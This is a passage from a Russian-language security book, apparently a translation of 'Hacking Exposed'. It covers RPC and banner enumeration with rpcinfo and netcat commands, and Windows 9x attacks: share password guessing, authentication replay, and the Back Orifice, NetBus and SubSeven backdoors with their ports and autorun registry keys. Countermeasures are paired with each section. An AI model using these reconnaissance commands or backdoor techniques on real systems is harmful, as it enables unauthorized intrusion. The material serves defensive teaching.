    (100000) portmapper 4 TCP 111
    (100000) portmapper 3 TCP 222
    (100001) rstatd 2 UDP 32774
    (100021) nlockmgr 1 UDP 4045

    Существует и несколько других приемов использования службы RPC, с помощью которых хакеры могут получать требуемую информацию. Так, в системе Solaris компании Sun используется вторая утилита, необходимая для работы с портами с номерами выше 32771. Следовательно, модифицированная версия утилиты rpcinfo при обращении к этому порту позволит получить приведенную выше информацию, даже если порт 111 заблокирован.
    Хотя лучший инструмент RFC-сканирования из всех, которые нам доводилось видеть, входит в состав коммерческого пакета CyberCop Scanner компании Network Associates, Inc., для поиска определенных приложений RPC хакер может воспользоваться бесплатной утилитой rpcinfo со специальными параметрами. Например, для того чтобы проверить, работает ли на исследуемом компьютере по адресу 192.168.202.34 сервер TTDB (ToolTalk Database), известный своей уязвимостью (см. главу 8), можно воспользоваться следующей командой.
     rcpinfo -n 32771 -t 192.168.202.34 100083
    В службе RPC серверу TTDB соответствует программный номер 100083.
    Самый простой способ воспрепятствовать такой утечке информации, —предусмотреть тот или иной механизм аутентификации, применяемый со службой RPC (более подробные сведения об имеющихся возможностях можно получить из документации). Второй метод состоит в использовании пакета, подобного Secure RPC компании Sun, который обладает встроенными средствами аутентификации, базирующимися на криптографическом механизме с использованием открытого ключа. Наконец, обязательно убедитесь в том, что порты 111и32771 (rpcbind) фильтруются на уровне брандмауэра.
    Как уже упоминалось в предыдущем разделе, посвященном методам инвентаризации Windows NT, классический способ проведения инвентаризации приложений практически любой системы состоит в подключении к порту, о котором известно, что он находится в состоянии ожидания запросов. Это можно осуществить с помощью утилит telnet или netcat. Мы не будем снова подробно рассматривать эти же вопросы, а лишь остановимся на некоторых полезных функциях netcat, которые вкратце описаны в файлах, поставляемых с самой утилитой. Например, попробуйте перенаправить вывод специального текстового файла на вход netcat, чтобы попытаться получить более подробную информацию. Создайте файл nudge. txt, содержащий одну-единственную строку GET / HTTP/1.0 и два символа перевода строки, а затем, запустите следующую команду.

    nc -nw -о banners.txt
    192.168.202.34 80 < nudge.txt

    HTTP/1.0 200 OK
    Server: Sun_WebServer/2.0
    Date: Sat, 10 Apr 1999 07:42:59 GMT
    Content-Type: text/html
    Last-Modified: Wed, 07 Apr 1999 15:54:18
    GMT
    ETag: "370a7fbb-2188-4"
    Content-Length: 8584
    <HTML> <HEAD>
    <META NAME="keywords"
    CONTENT="BigCorp, hacking, security">
    <META NAME="description"
    CONTENT»"Welcome to BigCorp's Web site.
    BigCorp is a leading manufacturer of security holes.">
    <TITLE>BigCorp Corporate Home Page</TITLE>
    </HEAD>



    Рис. 3.12. Команда Crawl Website программы Sam Spade позволяет с минимальными усилиями выполнить поиск интересующей информации в коде HTML всех страниц Web-узла

    Если в качестве параметра утилиты netcat используется IP-адрес исследуемого компьютера, то нужно указать также параметр -n.
    Известны ли вам хорошие методы проникновения в Webserver 2.0 компании Sun? Тогда вперед! Другими примерами содержимого такого текстового файла являются строки HEAD /HTTP/1.0<cr><cr>, QUiT<cr>, HELP<cr>, ECHO <cr> и даже просто пара символов перевода строки (<сr>).
    Необходимо также отметить, что немало "лакомых кусочков" информации можно найти в исходном HTML-коде Web-страниц. Одним из наших любимых инструментов для проверки целых Web-узлов (а также для выполнения других не менее полезных функций) является утилита Sam Spade компании Blighty Design (http://www.blighty. com/products/spade). На рис. 3.12 показано, как программа Sam Spade может проверить весь Web-узел в поисках заданной информации, например слова password.

    Контрмеры против сбора идентификационных маркеров



    Конечно, мы коснулись лишь нескольких из самых популярных приложений, поскольку ограничения по времени и объему не позволяют нам подробнее рассмотреть все многообразие существующего сетевого программного обеспечения. Однако, отталкиваясь от описанных в данном разделе общих подходов, необходимо по крайней мере "заткнуть рот" слишком "болтливым" приложениям вашей сети. Дополнительные сведения об устранении имеющихся изъянов можно поискать на Web-узле канадской консультационной компании PGCI. специализирующейся в области защиты информации, по адресу http://www.pgci.ca/p_fingerprint.html. Помимо интересной дискуссии о защите от попыток выявления типа и версии операционной системы (см. главу 2), на этом Web-узле приведены сведения о контрмерах, позволяющих предотвратить инвентаризацию идентификационных маркеров с помощью таких средств как программы sendmail, telnet, и протокол FTP. Там же вы найдете список адресов других Web-серверов, на которых содержится аналогичная информация.


    18.gif

    Изображение: 

    11. Резюме



    Резюме


    Если не считать времени, информация — это наиболее мощное оружие, которое может попасть в распоряжение хакера. К счастью, эта же информация может пригодиться и при обеспечении безопасности. В этой главе вы познакомились с несколькими источниками утечки информации, используемыми хакерами, а также узнали о некоторых способах устранения подобных проблем, вкратце перечисленных ниже.

    •  Фундаментальная архитектура операционных систем. Протоколы .SMB, CIFS и NetBIOS системы Windows NT весьма упрощают задачу получения информации о пользователях, предоставляемых ресурсах файловых систем и приложениях. Ограничьте доступ к TCP-портам с номерами 139 и 445, а также установите значение параметра RestrictAnonymous системного реестра, как описано в начале данной главы. Не забывайте также о том, что в системе Win 2000 устранены далеко не все недостатки. Напротив, в ней появились новые возможности получения ценной информации от службы активного каталога. То же самое относится и к архитектуре системы Novell NetWare. Эта система также позволяет получить подобную информацию любому желающему, так что для обеспечения безопасности нужно прилагать определенные усилия.
    •  SNMP. Этот протокол специально разрабатывался для предоставления как можно более подробной информации и облегчения управления сетями масштаба предприятия. Именно поэтому неправильно настроенный агент SNMP, использующий строки доступа по умолчанию, например public, может выдать несанкционированному пользователю очень много не подлежащих разглашению данных.
    •  Приложения. Утилиты finger и rpcbind являются хорошими примерами программ, которые предоставляют слишком подробную информацию. Кроме того, многие приложения по первому требованию неосмотрительно предъявляют идентификационные маркеры, содержащие номер версии и название компании-разработчика. Запретите использование приложений, подобных finger, используйте защищенную службу RPC, или TCP-оболочки. И наконец, узнайте у разработчика, как отключить режим предоставления идентификационных маркеров!
    •  Брандмауэр. Многие источники утечки информации можно выявить с помощью брандмауэра. Это вовсе не означает, что при наличии в сети брандмауэра можно не уделять внимания вопросам защиты на уровне отдельных компьютеров. Брандмауэр позволяет значительно снизить риск проникновения в сеть лишь при условии комплексного подхода к обеспечению безопасности.


    Глава 4. Уязвимость Windows 95/98/ME



    Глава 4. УЯЗВИМОСТЬ WINDOWS 95/98/ME




    1. Уязвимость Windows 95/98/ME



    Уязвимость WINDOWS 95/98/ME


    Самое важное, что должен знать администратор сети или конечный пользователь Windows 95/95B/98/98SE (далее — Win 9х), — это то, что при проектировании данной операционной системы вопросам безопасности не уделялось большое внимание, в отличие от ее "двоюродной сестры" Windows NT/2000. По существу складывается впечатление, что при планировании архитектуры Win 9x компания Microsoft везде, где только было можно, пожертвовала безопасностью в угоду простоте использования.
    Такой подход представляет собой двойную угрозу для администраторов, а также пользователей, которых волнуют вопросы безопасности. Вторая проблема заключается не в простоте настройки операционной системы Win Эх, а в том, что те, кто ее настраивает, как правило, не принимают всех должных мер предосторожности (например, выбор хорошего пароля).
    Более того, неосведомленный пользователь может, сам того не зная, предоставить потайной ход в корпоративную сеть своей организации или хранить важную информацию на домашнем компьютере, подключенном к Internet. С развитием высокоскоростных кабельных линий связи, обеспечивающих круглосуточное подключение, эта проблема только обостряется. Независимо от того, являетесь ли вы администратором Win Эх или же используете эту систему для просмотра ресурсов Internet и доступа к сети компании из дома, вам необходимо понимать, какие средства и методы могут быть применены против вас.
    К счастью, простота Win Эх имеет и обратную сторону. В каком-то смысле можно сказать, что эта простота обеспечивает безопасность системы. Поскольку Win 9x не является по-настоящему многопользовательской операционной системой, она поддерживает чрезвычайно малый набор возможностей удаленного администрирования. В частности, с использованием встроенных средств Win Эх невозможно осуществить удаленный запуск команд, а удаленный доступ к системному реестру Win Эх возможен только в том случае, если запрос сначала прошел через сервер безопасности, такой как Windows NT/2000 или Novell NetWare. Такой подход называется защитой на уровне пользователей (user-level security), в отличие от используемого по умолчанию подхода Win 9x, обеспечивающего защиту на уровне совместно используемых ресурсов (share-level security) с помощью паролей/имени пользователя (Win 9x не может выполнять функции сервера аутентификации на уровне пользователей).
    Таким образом, в распоряжении взломщика остается лишь два метода проникновения в систему Win 9x — заставить оператора так или иначе выполнить нужный взломщику программный код или получить физический доступ к системной консоли. Поэтому материал данной главы состоит из двух разделов, первый из которых посвящен методам удаленного проникновения, а второй — методам локального проникновения.
    В конце главы мы кратко рассмотрим средства защиты новой версии флагмана программных продуктов компании Microsoft, Windows Millenium Edition (ME). Рискуя немного испортить впечатление, мы все же вынуждены сказать, что те из пользователей, кто заинтересован в реальной защите, должны всерьез подумать о переходе на систему Windows 2000, а не на ME. В составе Win 2000 имеются все средства, способные значительно повысить стабильность ее работы и уровень защиты, в чем так нуждаются начинающие пользователи.

    Win 9x по праву считается системой, предназначенной для конечного пользователя. Зачастую самый простой способ проникновения в такую систему заключается в анализе данных Web или почтовых сообщений, передаваемых пользователю, а не в использовании средств самой операционной системы. В связи с этим мы настоятельно рекомендуем познакомиться с главой 16.


    2. Удаленное проникновение



    Удаленное проникновение


    Методы удаленного проникновения в систему Win 9x условно можно разделить на четыре категории: прямое подключение к совместно используемому ресурсу (в том числе и ресурсам удаленного доступа); установка фонового сервера, предназначенного для создания "потайного хода''; использование известных изъянов приложений; генерация условия DoS (denial of service — отказ в обслуживании). Необходимо отметить, :о для реализации трех из перечисленных методов требуется, чтобы либо система была настроена неправильно, либо ее пользователь не имел практически никаких навыков администрирования. Ввиду того что такие ситуации случаются крайне редко, противостоять попыткам удаленного проникновения в общем случае довольно легко.


    3. Прямое подключение к совместно используемым ресурсам Win 9x



    Прямое подключение к совместно используемым ресурсам Win 9x


    Этот метод проникновения в удаленную систему Win 9x является самым очевидным и легко осуществимым. Win 9x поддерживает три способа получения прямого доступа к системе: путем подключения к совместно используемым файлам и принтерам; через компонент сервера удаленного доступа (по умолчанию не устанавливается); посредством удаленного манипулирования системным реестром. Последний способ требует специальной настройки и знания системы зашиты на уровне пользователей, т то за пределами корпоративных сетей случается крайне редко.
    Что касается первого метода проникновения, то он основывается на получении сведений, передаваемых удаленным пользователем при его подключении к совместно используемому ресурсу компьютера, работающего под управлением Win 9х. Поскольку пользователи часто используют одни и те же пароли, такая информация может облегчить получение доступа и к самой системе. Более того, это может привести к проникновению в другие системы сети.

    Хзкинг совместно используемых файлов и принтеров Win 9x



    Мы не знаем ни одного метода, с помощью которого можно было бы извлечь хоть какую-то пользу от доступа к совместно используемому принтеру Win 9x, поэтому посвятим оставшуюся часть раздела исключительно проблеме доступа к совместно 'используемым файлам Win 9x.
    При рассмотрении инструментальных средств и методов, которые могут использоваться взломщиками для сканирования сетей в поиске совместно используемых ресурсов Windows (см. главу 3) отмечалось, что некоторые из них также обладают возможностью подбора пароля для получения доступа к выявленным ресурсам. Одной из таких утилит является уже известная нам программа Legion. Помимо обеспечения сканирования заданного диапазона IP-адресов в поисках совместно используемых ресурсов Windows, Legion также содержит средство взлома паролей (средство BF). с помощью которого можно попытаться подобрать пароль по списку, содержащемуся в текстовом файле, и автоматически подключиться, если попытка завершилась удачно. Аббревиатура BF означает "brute force", т.е. взлом, однако более корректно называть эту функцию "подбором пароля", так как она базируется на использовании списка паролей. Один совет: кнопка Save Text главного окна программы Legion предназначена для сохранения имен обнаруженных совместно используемых ресурсов в текстовом файле, что повышает удобство работы при вводе значения в поле Path окна Force Share (рис. 4.1).



    Рис. 4.1. Средство BF программы Legion позволяет подобрать пароль к совместно используемому ресурсу Windows

    Вред, который может нанести злоумышленник, получивший таким образом доступ к системе, зависит от каталога, к которому он подключился. Если в этом каталоге находятся файлы, критичные для безопасности, или же если данный ресурс представляет собой целый раздел жесткого диска (чем нередко грешат пользователи), то последствия могут оказаться поистине разрушительными. Взломщик может просто поместить выполняемый файл в каталог %systemroot%\Start Menu\Programs\Startup, и при последующей перезагрузке компьютера данная программа будет автоматически запущена без ведома пользователя. (Примеры программ, которые могут быть внедрены в систему таким образом, приведены в следующем разделе этой главы, посвященном одной из таких программ — Back Orifice). Наконец, в распоряжении хакера может оказаться файл PWL (об этом мы поговорим несколько позже).

    Контрмеры: защита от хакинга совместно используемых файлов



    Защититься от подобного нападения очень легко. Достаточно просто-напросто отключить режим совместного использования файлов на компьютере с Win 9x! Системным администраторам, в ведении которых находится много компьютеров, мы советуем использовать редактор системной политики (System Policy Editor) POLEDIT. EXE, с помощью которого можно запретить совместный доступ к файлам и принтерам на всех компьютерах сети. Программа POLEDIT . EXE, окно которой вы видите на рис. 4.2, входит в состав комплекта Windows 9x Resource Kit (далее — Win 9x RK). Найти ее можно в каталоге \tools\reskit\netadmin установочных компакт-дисков системы Win9x .
    Если вам все же необходимо разрешить совместное использование ресурсов, обязательно применяйте сложные пароли из восьми алфавитно-цифровых символов (к сожалению, в системе Win Эх — это максимальная длина пароля), а также метасимволов (т.е. [ ! @ # $ % &) и управляющих символов ASCII. Кроме того, имеет смысл добавить к имени совместно используемого ресурса символ $, как показано на рис. 4.3. чтобы это имя не отображалось в папке Network Neighborhood при использовании команды net view и даже в результатах, полученных в ходе сканирования сети с помощью утилиты Legion.



    Рис. 4.2. С использованием редактора системной политики Windows 9x администратор сети может запретить пользователям предоставлять ресурсы своих компьютеров для совместного или удаленного доступа



    Рис. 4.3. Набавив символ $ к имени совместно используемого ресурса, вы тем самым сделаете его "невидимым" в сетевом окружении, а также для многих утилит сканирования NetBIOS

    Повторное использование данных . аутентификации Win 9x



    5 января 1999 года группа исследования вопросов безопасности, известная под названием LOpht, обнародовала документ, содержащий информацию о выявленном ею изъяне в процедуре сетевой аутентификации, выполняемой при предоставлении доступа к совместно используемым файловым ресурсам. Тестируя очередную версию своего печально известного средства LOphtcrack. предназначенного для взлома и скрытного хищения паролей (см. главу 5). было установлено, что система Win 9x, на которой установлен режим совместного использования файлов и принтеров, каждые 15 минут обращается к удаленному компьютеру за подтверждением соединения. Поскольку система Windows в этом запросе использует комбинацию хэш-кода пароля и имени удаленного пользователя, а также учитывая, что имя пользователя передается в виде незакодированного текста, взломщик может просто переслать перехваченный им запрос на аутентификацию и успешно подключиться к совместно используемому ресурсу системы Win 9x. Если все это произойдет в течение 15 минут, хэшировпнный пароль будет идентичным.
    Хотя этот случай является классической криптографической ошибкой, которую компания Microsoft просто не должна была допустить, данным изъяном очень трудно воспользоваться. В документе группы LOpht говорится о возможности модификации исходного текста популярного сетевого клиента Windows для UNIX под названием Samba  в целях ручного восстановления потока данных, передаваемых по сети при аутентификации. Однако уровень квалификации программиста, необходимый для успешного решения этой задачи, а также необходимость иметь доступ к локальному сетевому сегменту для прослушивания какого-либо соединения, делает повсеместное распространение данного подхода маловероятным.

    Хакинг сервера удаленного доступа Win 9x



    Показанный на рис. 4.4 компонент Windows Dial-Up Server, входящий в состав Win 9x, — это еще одна "приятная неожиданность" для системного администратора. Любой пользователь, установив пакет Microsoft Plus! for Windows 95 и подключив модем, может создать брешь в системе защиты корпоративной сети (пакет Microsoft Plus! входит в стандартный комплект поставки Win 98).
    Система, функционирующая в качестве сервера удаленного доступа, как правило, разрешает и совместный доступ к файлам (иначе устанавливать сервер удаленного доступа нет никакого смысла). Это означает, что пользователь, находящийся по ту сторону модемного соединения, может провести инвентаризацию всех совместно используемых ресурсов и попытаться подобрать пароли (если, конечно, они вообще используются). Об этом уже упоминалось в предыдущем разделе. Все различие в подходах заключается лишь в установлении связи не по локальной сети, а через сервер удаленного доступа.



    Рис. 4.4. Превратить систему Win 9х в сервер удаленного доступа чрезвычайно просто

    Контрмеры: защита от хакинга через удаленные соединения



    Совсем не удивительно, что рекомендации остаются прежними. Во-первых, сами не используйте сервер удаленного доступа Win 9х а во-вторых, с помощью редактора системной политики запретите его устанавливать и пользователям. Если же удаленный доступ все-таки очень необходим, обязательно устанавливайте пароль для входящих подключений и обеспечьте его шифрование. (Такой режим можно установить в диалоговом окне Server Туре, которое открывается после щелчка на одноименной кнопке диалогового окна свойств Dial-Up Server). Можно также перейти к аутентификации на уровне пользователя, т.е. выполнять аутентификацию с помощью сервера безопасности, такого как контроллер домена Windows NT или сервер NetWare. Установите пароль для доступа к каждому совместно используемому ресурсу (причем чем сложнее пароль, тем лучше), а также сделайте эти ресурсы скрытыми, добавив к их именам символ $.
    Взломщик, которому удастся проникнуть через сервер удаленного доступа и подобрать пароль к совместно используемым ресурсам, может воспользоваться любой информацией, которую он обнаружит в открывшихся ему папках и файлах. Однако он не сможет проникнуть в сеть непосредственно через систему Win 9x, поскольку она не обеспечивает маршрутизацию потока данных.
    Необходимо также помнить, что удаленные соединения (DUN — Dial-Up Networking) уже давно не являются исключительно модемной технологией. Теперь возможности удаленного доступа используются в виртуальных частных сетях (VPN — Virtual Private Networking), о которых мы поговорим в главе 9. Поэтому нам кажется, что необходимо сказать пару слов об одном из самых важных с точки зрения обеспечения безопасности модуле обновления встроенной поддержки сетей VPN в Win 9x. Этот модуль, называемый Dial-Up Networking Update 1.3 (DUN 1.3), позволяет системе Win 9х устанаштивать более защищенные соединения с серверами виртуальной частной сети Windows NT. Если вы используете технологию VPN компании Microsoft, не раздумывая установите модуль DUN 1.3. DUN 1.3, как мы вскоре убедимся, позволяет также защититься от нарушения работы из-за возникновения условия DoS.
    Подробнее о недостатках удаленного доступа и сетей VPN мы поговорим в главе 9.

    Удаленный хакинг системного  реестра Win 9x



    В отличие от Windows NT, система Win 9x не содержит встроенных средств поддержки удаленного доступа к системному реестру. Однако если установлен компонент Remote Registry Service (RRS), который можно найти на установочном компакт-диске Windows 9х в каталоге \admin\nettools\remotreg. то это становится вполне возможным. Для работы службы RRS необходимо переключиться в режим защиты на уровне пользователей. Следовательно, для получения доступа потребуется вести правильное имя пользователя. Если взломщику повезет и ему попадется система с установленным компонентом RRS и совместно используемым каталогом, доступным для записи, а также если ему удастся узнать какое-нибудь имя пользователя и подобрать соответствующий пароль, то в результате он сможет сделать с такой системой все, что только пожелает. Легко ли отвести от себя такую угрозу? Нам кажется, что да. Более того, чтобы ее создать, надо немало потрудиться. Если вы хотите установить службу RRS, обязательно выберите хороший пароль, и этого будет достаточно. В противном случае не устанавливайте этот компонент вообще и спите спокойно, зная, что все попытки получить доступ к реестру закончатся ничем.
    Последняя в нашем перечне, но далеко не последняя по степени риска и последствиям угроза удаленного проникновения состоит в использовании протокола SNMP (Simple Network Management Protocol). В главе 3, мы уже говорили о том, что этот протокол может с успехом применяться для инвентаризации компьютеров, работающих пол управлением Windows NT, на которых запушен агент SNMP, настроенный на использование установленных по умолчанию строк доступа типа public. To же самое относится и к системе Win 9x, если на ней установлен агент SNMP (соответствующий модуль можно найти в каталоге \tools\reskic\netadmin\snmp установочного компакт-диска). Однако поддержка протокола SNMP в Win 9x отличается от его реализации в Windows NT тем, что при этом не сообщается информация об именах пользователей и совместно используемых ресурсов, поскольку в Win 9x реализована версия 1 информационной управляющей базы Ml В. Таким образом, в данном случае возможности по использованию протокола SNMP ограничены.


    1.gif

    Изображение: 

    2.gif

    Изображение: 

    3.gif

    Изображение: 

    4.gif

    Изображение: 

    4. "Потайные ходы" и программы типа "троянский конь" в Win 9x



    "Потайные ходы" и программы типа "троянский конь" в Win 9x


    Если предположить, что в вашей системе Win Эх не используется совместный доступ к файлам, не установлен сервер удаленного доступа и отсутствует поддержка удаленного доступа к системному реестру, то можно ли считать ваш компьютер защищенным? По-видимому, в настоящий момент на этот риторический вопрос можно дать отрицательный ответ. Если злоумышленникам не хватает средств удаленного администрирования, они просто пытаются их установить.
    В этом разделе мы рассмотрим три наиболее популярные из таких программ, которые разработаны по технологии клиент/сервер. Каждую из них можно найти в Internet. Кроме того, вы познакомитесь с "троянскими конями" — программами, которые на первый взгляд выглядят достаточно полезными, однако на самом деле содержат другой код, который может привести к злонамеренным или разрушительным действиям. Конечно, в Сети можно обнаружить бесчисленное множество таких программ и для их описания не хватит даже самой толстой книги.

    Back Orifice



    Программа Back Orifice (ВО), фактически являясь одной из самых известных программ хакинга Win 9x, анонсирована разработчиками как средство удаленного администрирования системы Win 9x. Эта программа была выпущена летом 1998 года в соответствии с соглашениями по безопасности Black Hat (http: //www.blackhat.com/), и ее по-прежнему можно свободно получить по адресу (http: //www.cultdeadcow.com/tools). Back Orifice позволяет получить практически полный удаленный контроль над системой Win 9x, включая возможность добавления и удаления ключей системного реестра, перезагрузки системы, отправки и получения файлов, просмотра кэшированных паролей, порождения процессов и создания совместно используемых файловых ресурсов. Кроме того, другими хакерами для исходного сервера ВО были написаны подключаемые модули, предназначенные для установления связи с определенными каналами IRC (Internet Relay Chat), такими, например, как #BO_OWNED, и последующего разглашения IP-адреса жертвы всем, кто интересуется подобными вещами.
    Программу ВО можно настроить таким образом, чтобы она самостоятельно устанавливалась и запускалась с использованием любого имени файла ([space] .exe используется по умолчанию). При этом добавляется параметр в ключ системного реестра HKEY_LOCAL_MACHINE\ Software\MicrosoftWindows\CurrentVersion\RunServices , чтобы запуск ВО выполнялся при каждой загрузке компьютера. По умолчанию программой ВО применяется UDP-порт с номером 31337.
    Очевидно, что программа ВО является воплощением мечты любого хакера, если не для проникновения в систему, то уж наверняка для удовлетворения болезненного любопытства. Появление ВО оказалось настолько грандиозным событием, что через год появилась вторая версия: Back Orifice 2000 (ВО2К, http://www.bo2k.com). Программа ВО2К имеет те же возможности, что и ее предыдущая версия, за исключением следующего. Во-первых, и клиентская и серверная части работают в системах Windows NT/2000 (а не просто в Win 9л:). А, во-вторых, появился набор средств разработки, что значительно затрудняет выявление различных модификаций этой программы. По умолчанию программой ВО2К используется TCP-порт 54320 или UDP-порт 54321 и выполняется копирование файла UMGR32.EXE в папку %systemroot%. Для предотвращения принудительного завершения работы ВО2К в списке задач будет маскироваться под именем EXPLORER. Если программа разворачивается в скрытом режиме, то она будет установлена в качестве службы удаленного администрирования (Remote Administration Service), в ключ HKLM\SOFTWARE\Microsoft\Windows\ CurrentVersion\RunServices будет добавлен соответствующий параметр, а затем будет удален исходный файл. После этого запуск программы ВО2К будет выполняться при каждой загрузке компьютера. Все эти действия можно выполнить также с помощью утилиты bo2kcfg.exe, распространяемой вместе с пакетом Back Orifice 2000. На рис. 4.5 представлен внешний вид клиентной части программы ВО2К, bo2kgui. ехе, которая осуществляет контроль системы Win 98SE. Из рис. 4.5 видно, что теперь клиент ВО2К может использоваться для остановки удаленного сервера и его удаления из инфицированной системы. Для этого нужно открыть папку Server Control, выбрать элемент Shutdown Server, а затем ввести команду DELETE.



    Рис. 4.5. Клиентская программа с графическим интерфейсом (bo2kgui.exe) из пакета Back Orifice 2000 (ВО2К) управляет "потайным ходом " системы Win 9х. С ее помощью можно удалить и сам сервер ВО2К

    У клиента ВО2К имеется одна особенность, которая плохо документирована. Она заключается в том, что иногда в поле Server Address необходимо указывать номер порта (например, 192.168.2.78:54321, а не просто IP-адрес или имя DNS).

    NetBus



    Более требовательному хакеру, возможно, больше понравится "дальняя кузина" ВО — программа NetBus, позволяющая получить удаленное управление над системой Windows (в том числе и Windows NT/2000). Эта программа, написанная Карлом-Фредериком Нейктером (Carl-Fredrik Neikter), имеет более привлекательный и понятный интерфейс, а также более эффективный набор функций. В частности, она оснащена графическим интерфейсом, с помощью которого можно осуществлять удаленное управление (правда, только для высокопроизводительных соединений). Программа NetBus тоже позволяет гибко настраивать параметры. Кроме того, в Internet можно найти несколько ее модификаций. Сервер, запускаемый по умолчанию, имеет имя patch.exe (хотя его можно заменить на любое другое). Обычно при установке в ключ системного реестра HKEY_LOCAL_MACHINEXSoftware\ Microsoft\Windows\CurrentVersion\Run добавляется соответствующий параметр, чтобы сервер запускался каждый раз при загрузке компьютера.
    По умолчанию с программой NetBus связывается TCP-порт 12345 или 20034. Поскольку эта программа не позволяет использовать UDP-порт (как ВО2К), то пересылаемые ею данные могут с большей вероятностью отфильтровываться брандмауэром.

     SubSeven



    Судя по всему, сервер SubSeven по популярности превосходит программы ВО, ВО2К и NetBus вместе взятые. Он определенно более стабильный, простой в использовании и предоставляет гораздо более широкие возможности хакерам. Эту программу МОЖНО найти ПО адресу http://subseveri.slak.org/main.html.
    С сервером SubSeven (S7S) по умолчанию связан TCP-порт 27374, который используется по умолчанию и для клиентских соединений. Как и ВО и NetBus, программа S7S предоставляет взломщику практически полный контроль пал "жертвой". включая следующие возможности.

    •  Сканирование портов (выполняется непосредственно на удаленном компьютере!).
    •  Запуск FTP-сервера с корневым каталогом С:\ (с неограниченными правами чтения/записи).
    •  Удаленное редактирование системного реестра.
    •  Извлечение кэшированных паролей, а также паролей RAS, ICQ и других служб.
    •  Перенаправление потоков ввода-вывода портов и приложений.
    •  Печать.
    •  Перезагрузка удаленной системы.
    •  Регистрация нажатий на клавиши (по умолчанию прослушивается порт 2773).
    •  Удаленный терминал (по умолчанию прослушивается порт 2773).
    •  Перехват управления мышью.
    •  Контроль за удаленными приложениями iCQ, AOL Instant Messenger, MSN Messenger и Yahoo Messenger (по умолчанию используется порт 54283).
    •  Запуск Web-броузера и переход на узел, заданный пользователем.

    Сервер предоставляет также возможность использования канала IRC, что позволяет взломщику задать IRC-сервер и канал, к которому нужно подключиться. После этого сервер S7S передает данные о своем местоположении (IP-адрес, связанный с ним порт и пароль). Кроме того, S7S может функционировать в качестве стандартного IRC-сервера, передавать через канал команды, уведомлять взломщика об успешном поиске ценной информации через службу ICQ, почтовые службы, а также выполнять множество других действий.
    С помощью приложения EditServer, распространяемого вместе с S7S, сервер можно настроить таким образом, чтобы он загружался в процессе загрузки системы. Для этого нужно поместить параметр WinLoader в ключ Run/RunServices или внести соответствующие изменения в файл WIN. INI.
    Как видно из информации одного из популярных списков почтовой рассылки, посвященного вопросам безопасности в Internet, представители крупных телекоммуникационных компаний США жаловались на то, что на протяжении конца января и начала марта 2000 года большое количество компьютеров их корпоративных сетей было поражено программой S7S. Все серверы подключались к виртуальному IRC-cepsepy (irc.ircnetwork.net, а не к определенному серверу) и использовали один и тот же канал. При этом примерно через каждые пять минут передавался их IP-адрес, номер порта и пароль. В качестве заключения можно сказать следующее: после того, как сервер поместил в открытый канал пароль и другие важные данные, практически любой пользователь, подключенный к этому же каналу, с помощью клиента SubTClient может подключиться к инфицированному компьютеру и выполнять любые действия. Вне всяких сомнений, Sub? представляет собой сложную и скрытую программу, которая прекрасно подходит для сетевого хакинга. FTP-сервер, входящий в состав пакета Sub7, представлен на рис. 4.6.



    Рис. 4.6. Клиент SubSeven предоставляет возможности использования FTP-cepeepa

    Контрмеры: ликвидация "потайных ходов" и удаление "троянских коней"



    Все приложения-серверы, создающие "потайные ходы", должны выполняться на целевом компьютере. Их нельзя запустить удаленно (конечно, если ранее удаленная система не стала "собственностью" хакера). Обычно это можно осуществить, воспользовавшись распространенными ошибками клиентов Internet и/или элементарным обманом. Возможно, взломщики применят оба подхода. Эти методы, а также возможные контрмеры, более подробно рассматриваются в главе 16. Здесь же стоит сказать лишь следующее: постоянно выполняйте обновление используемого клиентского программного обеспечения, предназначенного для работы в Internet, и тщательно осуществляйте его настройку.
    Другая возможность закрытия всех "тайных лазеек" заключается в предотвращении внешнего доступа к тем открытым портам, которые обычно используются такими программами. Через соответствующие порты с большими номерами нам удавалось подключиться ко многим узлам с помощью брандмауэра. При этом подключение к запущенным серверам внутренних сетей превращалось в детскую игру. Полный список портов, используемых "троянскими конями" и приложениями, применяемыми для создания "потайных ходов", можно найти на Web-узле компании TLSecurity по адресу http://www.tlsecurity.net/trojanh.htm.
    Уделяйте пристальное внимание вопросам контроля доступа к брандмауэрам из внутренней сети. Хотя более опытные взломщики могут настроить свои серверы и на использование портов 80 и 25 (которые практически всегда доступны для таких целей), это значительно сузит спектр их возможностей.
    Для тех, кто хочет познакомиться с рассматриваемой проблемой поглубже и удостовериться в ее отсутствии в действующей сети, можно обратиться к базе данных компании TLSecurity по адресу http://www.tlsecurity.net/tlfaq.htm. Ее автор, группа Int-13h, провела кропотливую работу по сбору всеобъемлющей и подробной информации о том, где можно найти подобное программное обеспечение. (Возможно ли, чтобы в этой базе данных упоминалось каждое из таких средств? Познакомьтесь с содержащимся там перечнем.)
    В настоящее время многие из антивирусных программных продуктов позволяют выполнять поиск всех подобных средств (перечень коммерческих производителей можно найти в базе данных компании Microsoft (Knowledge Base) в статье Q495000 по адресу http://search.support.microsoft.com). Специалисты Int_13h настоятельно рекомендуют использовать пакет AntiViral Toolkit Pro (AVP), который можно найти по адресу http://www.avp.com. Некоторые компании предоставляют средства, предназначенные для удаления "троянских коней" и ликвидации других "потайных ходов", например пакет TDS (Trojan Defense Suite). Его можно найти по адресу http: //www.multimania.com/ilikeit/tds .htm (еще одна рекомендация Int_13h).
    Остерегайтесь волков в овечьих шкурах. Например, одно из средств удаления программы ВО, называемое BoSniffer, на самом деле является "троянским конем" и содержит саму программу ВО. Будьте осмотрительны в применении свободно распространяемых утилит поиска "троянских коней".
    Программное обеспечение для создания "потайных ходов" и "троянские кони'' будут рассматриваться также в главе 14.


    5.gif

    Изображение: 

    6.gif

    Изображение: 

    5. Известные изъяны серверных приложений



    Известные изъяны серверных приложений


    ВО — это не единственный пример программы, которая делает узел уязвимым перед вторжением извне. Существует немало как некоммерческих, так и коммерческих программ, которые, пусть и непреднамеренно, но все же фактически делают то же самое. Пожалуй, невозможно перечислить все программы для Win 9x, угрожающие в той или иной степени безопасности, однако имеется одно универсачьное средство: не запускайте серверные приложения под Win 9x, если вы не уверены в их безопасности. Одним из ярких примеров такой популярной, но обладающей очень большим потенциалом с точки зрения проникновения в систему, является Personal Web Server компании Microsoft. Его необновленные версии могут предоставлять содержимое файлов взломщикам, которые знают их расположение на диске и используют в запросах нестандартные URL (более подробную информацию об этом можно получить по адресу http://www.miсгosoft.com/security/bulletins/ms99-010.asp).
